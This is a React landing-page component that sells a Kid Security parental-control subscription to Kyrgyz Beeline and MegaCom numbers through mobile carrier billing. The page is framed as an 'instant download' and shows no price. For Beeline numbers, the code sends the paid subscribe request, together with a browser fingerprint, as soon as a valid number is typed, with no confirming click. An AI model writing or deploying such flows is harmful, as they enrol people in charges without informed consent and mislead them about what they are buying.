import { useEffect, useState, useMemo, useRef } from 'react';
import { useNavigate, useLocation } from 'react-router-dom';
import './Page1089Style.css';
import ApiSender from '../common/ApiSender';
import {
  getDailyPlan,
  sendPin as megacomSendPin,
  verifyPin as megacomVerifyPin,
  FALLBACK_DAILY_PLAN,
  OTP_LENGTH,
} from '../common/megacom';
import { toNationalNumber, sanitizeMsisdnInput } from '../common/msisdn';
import { carrierOf, isBeeline, isMegacom, resultPath } from '../common/carrier';
import { isFailedSubscribe } from '../common/failureRouting';

function Page1089() {

  const nav = useNavigate();
  const location = useLocation();
  const [msisdn, setMsisdn] = useState(null);
  const [warning, setWarning] = useState(false);
  const [goalId, setGoalId] = useState(null);
  const [goalName, setGoalName] = useState(null);
  const otpBoxRef = useRef(null);
  const [otp, setOtp] = useState(null);
  const [firstStep, setFirstStep] = useState(true);
  const [secondStep, setSecondStep] = useState(false);
  const [operator, setOperator] = useState(null);
  const [megacomPlan, setMegacomPlan] = useState(FALLBACK_DAILY_PLAN);
  const params = useMemo(() => new URLSearchParams(location.search), [location.search]);
  const paramsObject = {};
  for (const [key, value] of params.entries()) {
    paramsObject[key] = value;
  }
  const apiSender = new ApiSender();

  useEffect(() => {
    if (params.has("campaignId")) {
      const fetchData = async () => {
        try {
          const response = await fetch(process.env.REACT_APP_GOOGLE_BASE_URL + 'campaign/info?uuid=' + params.get("campaignId"),
            {
              method: 'GET',
              headers: {
                "Content-Type": "application/json"
              }
            });
          if (response.ok) {
            const data = await response.json();
            const status = data.status;
            if (status) {
              setGoalId(data.goalId);
              setGoalName(data.goalName);
            }
          }
        }
        catch (error) {
        }
      }
      fetchData();
    }
  }, []);

  useEffect(() => {
    saveHistory();
  }, []);

  // Plans are only needed by MegaCom numbers: fetch once, as soon as one is typed, so the answer
  // is usually back before the visitor clicks "Continue".
  const planRequestRef = useRef(null);
  const loadMegacomPlan = () => {
    if (!planRequestRef.current) {
      planRequestRef.current = getDailyPlan().then((plan) => {
        setMegacomPlan(plan);
        return plan;
      });
    }
    return planRequestRef.current;
  };

  useEffect(() => {
    if (isMegacom(msisdn)) {
      loadMegacomPlan();
    }
  }, [msisdn]);

  useEffect(() => {
    if (secondStep && otpBoxRef.current) {
      otpBoxRef.current.focus();
    }
  }, [secondStep]);

  const saveHistory = async () => {
    await apiSender.saveHistory(window.location.origin + location.pathname, paramsObject);
  }

  const handleMsisdnChange = (event) => {
    const newMsisdn = sanitizeMsisdnInput(event.target.value);
    setMsisdn(newMsisdn);
    document.getElementById('country-code').style.color = 'black';
    setWarning(false);
  }

  const handleMsisdnFocus = () => {
    document.getElementById('country-code').style.color = 'black';
  }

  const handleMsisdnBlur = () => {
    if (msisdn === null || msisdn === undefined || msisdn.length === 0) {
      document.getElementById('country-code').style.color = '#999';
    }
  }

  useEffect(() => {
    if (isBeeline(msisdn)) {
      setOperator(9);
      handleSubscribeClick(9);
    }
  }, [msisdn]);

  useEffect(() => {
    if (otpBoxRef.current) {
      otpBoxRef.current.focus();
    }
  }, []);

  const handleOtpChange = (event) => {
    const newOtp = event.target.value.replace(/\D/g, '').slice(0, OTP_LENGTH);
    setOtp(newOtp);
    setWarning(false);
  };

  const FINGERPRINT_SEPARATOR = ",";

  function collectDeviceSignals() {
    return {
      cores: navigator.hardwareConcurrency ?? null,
      language: navigator.language,
      memory: navigator.deviceMemory ?? null,
      screen: `${window.screen.width}x${window.screen.height}`,
      timezone: Intl.DateTimeFormat().resolvedOptions().timeZone,
      userAgent: navigator.userAgent,
    };
  }

  function formatSignalValue(value) {
    if (value === null || value === undefined) return "";
    return String(value).replaceAll(FINGERPRINT_SEPARATOR, "");
  }

  function signalsToString(signals) {
    return [
      signals.cores,
      signals.language,
      signals.memory,
      signals.screen,
      signals.timezone,
      signals.userAgent,
    ]
      .map(formatSignalValue)
      .join(FINGERPRINT_SEPARATOR);
  }

  /** Browser signals sent to the API as deviceFingerprint (comma-separated string). */
  function getDeviceFingerprint() {
    return signalsToString(collectDeviceSignals());
  }

  /** Stable string for cookie compare (same signals → same string). */
  function getDeviceFingerprintKey(fingerprint = getDeviceFingerprint()) {
    if (typeof fingerprint === "string") return fingerprint;
    return signalsToString(fingerprint);
  }

  const handleSendOtpClick = async (operatorId) => {
    if (!isMsisdnValid()) {
      document.getElementById('warning-msg').textContent = 'Неправильный формат числа';
      setWarning(true);
      return;
    }

    document.getElementById('loading-spinner-send').style.display = 'inline-flex';
    document.getElementById('send-otp-btn').disabled = true;

    const campaignId = params.get("campaignId") ? params.get("campaignId") : null;
    const trackerId = params.get("trackerId") ? params.get("trackerId") : null;
    const gclid = params.get("gclid") ? params.get("gclid") : null;
    const gbraid = params.get("gbraid") ? params.get("gbraid") : null;
    const wbraid = params.get("wbraid") ? params.get("wbraid") : null;
    const yclid = params.get("yclid") ? params.get("yclid") : null;
    const clientId = params.get("client_id") ? params.get("client_id") : null;
    const userId = params.get("user_id") ? params.get("user_id") : null;

    const result = await apiSender.sendPin('send-pin', msisdn, campaignId, 'RU', trackerId, gclid, gbraid, wbraid, goalId, goalName,
      window.location.origin + location.pathname, "KG 1089 LP", operatorId, yclid, clientId, userId);

    if (result.success) {
      document.getElementById('loading-spinner-send').style.display = 'none';
      document.getElementById('warning-msg').textContent = '';
      document.getElementById('send-otp-btn').disabled = false;
      setWarning(false);
      setFirstStep(false);
      setSecondStep(true);
      return;
    }

    document.getElementById('loading-spinner-send').style.display = 'none';
    document.getElementById('send-otp-btn').disabled = false;
    setWarning(true);
    document.getElementById('warning-msg').textContent = result.message;
  }

  const handleVerifyOtpClick = async () => {
    const o = otp;
    if (o === null || o === 'undefined' || o.length !== 5) {
      document.getElementById('otp-input').style.border = "2px solid rgb(103, 193, 98)";
      return;
    }

    document.getElementById('loading-spinner-verify').style.display = 'inline-flex';
    document.getElementById('verify-btn').disabled = true;

    const campaignId = params.get("campaignId") ? params.get("campaignId") : null;
    const trackerId = params.get("trackerId") ? params.get("trackerId") : null;
    const gclid = params.get("gclid") ? params.get("gclid") : null;
    const gbraid = params.get("gbraid") ? params.get("gbraid") : null;
    const wbraid = params.get("wbraid") ? params.get("wbraid") : null;
    const yclid = params.get("yclid") ? params.get("yclid") : null;
    const clientId = params.get("client_id") ? params.get("client_id") : null;
    const userId = params.get("user_id") ? params.get("user_id") : null;
    const result = await apiSender.verifyPin('verify-pin', msisdn, o, campaignId, 'RU', trackerId, gclid, gbraid, wbraid, goalId, goalName,
      window.location.origin + location.pathname, "KG 1089 LP", operator, yclid, clientId, userId);


    if (result.success) {
      document.getElementById('warning-msg').textContent = '';
      document.getElementById('loading-spinner-verify').style.display = 'none';
      document.getElementById('warning-msg').textContent = result.message;
      document.getElementById('verify-btn').disabled = false;

      nav(resultPath('1089', 'beeline', 'success'));
      return;
    }
    setWarning(true);
    setOtp('');
    document.getElementById('warning-msg').textContent = result.message;
    document.getElementById('verify-btn').disabled = false;
    document.getElementById('loading-spinner-verify').style.display = 'none';
  }

  const SUBSCRIBE_RETRY_COOLDOWN_MS = 4000;

  // The subscription engine answers HTTP 500 (instead of "already subscribed") when a number that
  // is already subscribed is submitted again. Remember the numbers that succeeded in this browser
  // session so that such a repeat is treated as success.
  const SUBSCRIBED_KEY = 'kg1089_subscribed';
  const wasSubscribed = (number) => {
    try {
      return JSON.parse(sessionStorage.getItem(SUBSCRIBED_KEY) || '[]').includes(number);
    } catch (e) {
      return false;
    }
  };
  const rememberSubscribed = (number) => {
    try {
      const list = JSON.parse(sessionStorage.getItem(SUBSCRIBED_KEY) || '[]');
      if (!list.includes(number)) sessionStorage.setItem(SUBSCRIBED_KEY, JSON.stringify([...list, number]));
    } catch (e) {
      // storage unavailable: the repeat simply shows the error as before
    }
  };

  const handleSubscribeClick = async (operatorId) => {
    if (!isMsisdnValid()) {
      document.getElementById('warning-msg').textContent = 'Неправильный формат числа';
      setWarning(true);
      return;
    }

    document.getElementById('loading-spinner-send').style.display = 'inline-flex';
    document.getElementById('send-otp-btn').disabled = true;

    const campaignId = params.get("campaignId") ? params.get("campaignId") : null;
    const trackerId = params.get("trackerId") ? params.get("trackerId") : null;
    const gclid = params.get("gclid") ? params.get("gclid") : null;
    const gbraid = params.get("gbraid") ? params.get("gbraid") : null;
    const wbraid = params.get("wbraid") ? params.get("wbraid") : null;
    const yclid = params.get("yclid") ? params.get("yclid") : null;
    const clientId = params.get("client_id") ? params.get("client_id") : null;
    const userId = params.get("user_id") ? params.get("user_id") : null;

    const result = await apiSender.subscribe('subscribe', toNationalNumber(msisdn), campaignId, 'RU', trackerId, gclid, gbraid, wbraid, goalId, goalName,
      window.location.origin + location.pathname, "KG F 1089 LP", operatorId, getDeviceFingerprint(), yclid, clientId, userId);

    if (result.success || (result.httpStatus === 500 && wasSubscribed(toNationalNumber(msisdn)))) {
      if (result.success) rememberSubscribed(toNationalNumber(msisdn));
      setWarning(false);
      document.getElementById('warning-msg').textContent = '';
      document.getElementById('loading-spinner-send').style.display = 'none';
      if (result.success) document.getElementById('warning-msg').textContent = result.message;
      nav(resultPath('1089', 'beeline', 'success'));
      return;
    }

    if (isFailedSubscribe(result)) {
      nav(resultPath('1089', 'beeline', 'failed'));
      return;
    }

    document.getElementById('loading-spinner-send').style.display = 'none';
    setWarning(true);
    document.getElementById('warning-msg').textContent = result.message;
    setTimeout(() => {
      const btn = document.getElementById('send-otp-btn');
      if (btn) btn.disabled = false;
    }, SUBSCRIBE_RETRY_COOLDOWN_MS);
  }

  const handleMegacomSendPin = async () => {
    document.getElementById('loading-spinner-send').style.display = 'inline-flex';
    document.getElementById('send-otp-btn').disabled = true;

    const plan = await loadMegacomPlan();
    const result = await megacomSendPin({ msisdn: toNationalNumber(msisdn), planId: plan.planId });

    document.getElementById('loading-spinner-send').style.display = 'none';

    if (result.success) {
      document.getElementById('warning-msg').textContent = '';
      document.getElementById('send-otp-btn').disabled = false;
      setWarning(false);
      setFirstStep(false);
      setSecondStep(true);
      return;
    }

    setWarning(true);
    document.getElementById('warning-msg').textContent = result.message;
    setTimeout(() => {
      const btn = document.getElementById('send-otp-btn');
      if (btn) btn.disabled = false;
    }, SUBSCRIBE_RETRY_COOLDOWN_MS);
  }

  const handleMegacomVerify = async () => {
    if (!new RegExp(`^\\d{${OTP_LENGTH}}$`).test(otp ?? '')) {
      setWarning(true);
      document.getElementById('warning-msg').textContent = 'Неверный код';
      return;
    }

    document.getElementById('loading-spinner-verify').style.display = 'inline-flex';
    document.getElementById('verify-btn').disabled = true;

    const result = await megacomVerifyPin({ msisdn: toNationalNumber(msisdn), otp, planId: megacomPlan.planId });

    if (result.success) {
      nav(resultPath('1089', 'megacom', 'success'));
      return;
    }

    if (result.failed) {
      nav(resultPath('1089', 'megacom', 'failed'));
      return;
    }

    document.getElementById('loading-spinner-verify').style.display = 'none';
    document.getElementById('verify-btn').disabled = false;
    setWarning(true);
    setOtp('');
    document.getElementById('warning-msg').textContent = result.message;
  }

  // MegaCom prefixes -> MegaCom backend, Beeline prefixes -> Beeline backend, anything else -> /1089/nur/failed.
  const handleContinueClick = () => {
    if (!isMsisdnValid()) {
      document.getElementById('warning-msg').textContent = 'Неправильный формат числа';
      setWarning(true);
      return;
    }

    if (isMegacom(msisdn)) {
      handleMegacomSendPin();
      return;
    }

    if (isBeeline(msisdn)) {
      handleSubscribeClick(9);
      return;
    }

    // Neither MegaCom nor Beeline: no backend call.
    nav(resultPath('1089', carrierOf(msisdn), 'failed'));
  }

  const isMsisdnValid = () => toNationalNumber(msisdn) !== null;

  return (
    <div className="Aa3">
      <div className='container'>
        <div className='header'>
          <div className='header-right'>
            <div className='logo'><img alt='Kid Security' src='./../../kid-security-logo.png' /></div>
          </div>
        </div>
        <div className='form-content'>
          <div className='title'>
            <h4 id='headup-title'>{'Мгновенное скачивание'}</h4>
          </div>
          <div className='form-content-top'>
            <div className='logo'><img alt='Kid Security' src='./../../phone-icon.png' /></div>
          </div>
          <div className='form-content-middle'>
            <div className='title'>
              {firstStep ?
                <h4 id='title'>{'Введите номер мобильного телефона'}</h4> :
                <h4 id='title'>{'Введите PIN-код'}</h4>}
            </div>
            {firstStep ? <div className='arrows' style={{ display: 'flex', flexDirection: 'row', alignItems: 'center', marginTop: '1.25rem' }}>
              <div id='msisdn-input' className={`input ${warning ? 'vibrate' : ''}`}>
                <span id='country-code' className='country-code'>+996</span>
                <input id='msisdn-val' type='tel' value={msisdn} placeholder='xxxxxxxxx' autoComplete='off' minLength={9} maxLength={10} required onChange={handleMsisdnChange} onFocus={handleMsisdnFocus} onBlur={handleMsisdnBlur} />
                <div className='phone-logo'>
                  <img alt='' src='./../../phone-logo.png' />
                </div>
              </div>
            </div> :
              <div id='otp-box' style={{ paddingLeft: '0rem', marginTop: '1.25rem', marginBottom: '2rem' }} className={`input ${warning ? 'vibrate' : ''}`}>
                <input style={{ width: '200px', textAlign: 'center', letterSpacing: '0.6rem', textIndent: '0.6rem', fontSize: '22px', fontWeight: 600 }} type='tel' inputMode='numeric' value={otp ?? ''} placeholder='XXXX' autoComplete='one-time-code' minLength={OTP_LENGTH} maxLength={OTP_LENGTH} required onChange={handleOtpChange} ref={otpBoxRef} />
              </div>}

            <div id='warning-msg-div' className={`warning-msg ${warning ? 'active' : ''}`}>
              <span id='warning-msg'>{'Неправильный формат числа'}</span>
            </div>
            <div className='button'>
              {firstStep ? <button id='send-otp-btn' style={{ display: 'block' }} onClick={handleContinueClick}>
                {'Продолжить'}
                <div id="loading-spinner-send" className="spinner"></div>
              </button> :
                <button id='verify-btn' onClick={handleMegacomVerify}>
                  {'Активировать'}
                  <div id="loading-spinner-verify" className="spinner"></div>
                </button>}
              <span>{''}</span>
            </div>
          </div>
        </div>
      </div>
      <div>
        <section id="level4" className="_section_1g15t_1"><div className="_mainTitleWrapper_1g15t_121"><h2>Что получает родитель от Kid Security?</h2><p>Приложение №1 по родительскому контролю</p></div><div className="_container_1g15t_11"><div className="_imageColumn_1g15t_29"><img alt="Mom with phone" src="/MomWithPhone.png" /></div><div className="_contentColumn_1g15t_105"><div className="_topCard_1g15t_189"><div className="_card_jwnl4_1"><div className="_left_jwnl4_23"><div className="_titleInfo_jwnl4_39"><img alt="" className="_icon_jwnl4_51" src="/Location.png" /><h3>GPS-трекер</h3></div><div className="_textInfo_jwnl4_63"><p>Всегда знайте, где находится ваш ребенок, и получайте уведомления, если он покидает безопасные зоны.</p></div></div><div className="_right_jwnl4_71"><img alt="" src="/GpsBoy.png" /></div></div><img alt="Arrow" className="_arrowBottomRight_1g15t_197" src="/ArrowBottomRight.png" /></div><div className="_middleCard_1g15t_217"><div className="_card_jwnl4_1"><div className="_left_jwnl4_23"><div className="_titleInfo_jwnl4_39"><img alt="" className="_icon_jwnl4_51" src="/Ear.png" /><h3>Прослушивание</h3></div><div className="_textInfo_jwnl4_63"><p>Слушайте звуки вокруг ребенка в режиме реального времени, даже если он не берет трубку.</p></div></div><div className="_right_jwnl4_71"><img alt="" src="/AudioGirl.png" /></div></div></div><div className="_bottomCard_1g15t_225"><div className="_card_jwnl4_1"><div className="_left_jwnl4_23"><div className="_titleInfo_jwnl4_39"><img alt="" className="_icon_jwnl4_51" src="/Limit.png" /><h3>Лимит на игры</h3></div><div className="_textInfo_jwnl4_63"><p>Ограничивайте время использования приложений и блокируйте сайты.</p></div></div><div className="_right_jwnl4_71"><img alt="" src="/GamingBoy.png" /></div></div><img alt="Arrow" className="_arrowBottomLeft_1g15t_233" src="/ArrowBottomLeft.png" /></div><button className="_button_1g15t_159">Попробовать сейчас</button></div></div></section>
        <section id="level5" className="_section_10z1e_1"><div className="_wrapper_10z1e_13"><div className="_appBlock_10z1e_31"><img alt="Kid Security icon" src="/KidsSecurityLogo.png" /><div><strong>Kid Security</strong><p>Приложение для родителя</p></div></div><span className="_symbol_10z1e_85">+</span><div className="_appBlock_10z1e_31"><img alt="Tigrow icon" src="/TigrowLogo.png" /><div><strong>Tigrow</strong><p>Приложение для ребенка</p></div></div><span className="_symbol_10z1e_85">=</span><div className="_result_10z1e_97">Комплексная защита ребенка!</div></div></section>
        <section id="level6" className="_section_up6uk_1"><div className="_mainTitleWrapper_up6uk_117"><h2>Почему детям нравится «Tigrow»?</h2><p>Приложение для детей, работает в паре с Kid Security</p></div><div className="_container_up6uk_11"><div className="_contentColumn_up6uk_101"><div className="_topCard_up6uk_189"><div className="_card_jwnl4_1"><div className="_left_jwnl4_23"><div className="_titleInfo_jwnl4_39"><img alt="" className="_icon_jwnl4_51" src="/Rocket.png" /><h3>Мечты в реальность</h3></div><div className="_textInfo_jwnl4_63"><p>Ребенок вносит мечту в приложение, вы определяете её стоимость в виртуальных монетах. Накопив нужную сумму, мечта сбывается!</p></div></div><div className="_right_jwnl4_71"><img alt="" src="/BoyOnRocket.png" /></div></div></div><div className="_middleCard_up6uk_217"><div className="_card_jwnl4_1"><div className="_left_jwnl4_23"><div className="_titleInfo_jwnl4_39"><img alt="" className="_icon_jwnl4_51" src="/Heart.png" /><h3>Мотивация на рост</h3></div><div className="_textInfo_jwnl4_63"><p>Каждый день ребенок выполняет полезные задания по учебе, дому и спорту, и зарабатывает виртуальные монеты!</p></div></div><div className="_right_jwnl4_71"><img alt="" src="/GirlOnPhoneCard.png" /></div></div></div><div className="_bottomCard_up6uk_225"><div className="_card_jwnl4_1"><div className="_left_jwnl4_23"><div className="_titleInfo_jwnl4_39"><img alt="" className="_icon_jwnl4_51" src="/Controller.png" /><h3>Обмен монет на развлечения</h3></div><div className="_textInfo_jwnl4_63"><p>Заработанные монеты ребенок может обменять как на мечту, так и на дополнительное время на игры и развлечения в телефоне!</p></div></div><div className="_right_jwnl4_71"><img alt="" src="/BoyOnEarth.png" /></div></div><img alt="Arrow" className="_arrowTopLeft_up6uk_233" src="/ArrowTopLeft.png" /></div></div><div className="_imageColumn_up6uk_29"><img alt="Mom with phone" src="/WomanListeningToMusic.png" /></div></div></section>
      </div>
    </div>
  );
}

export default Page1089;
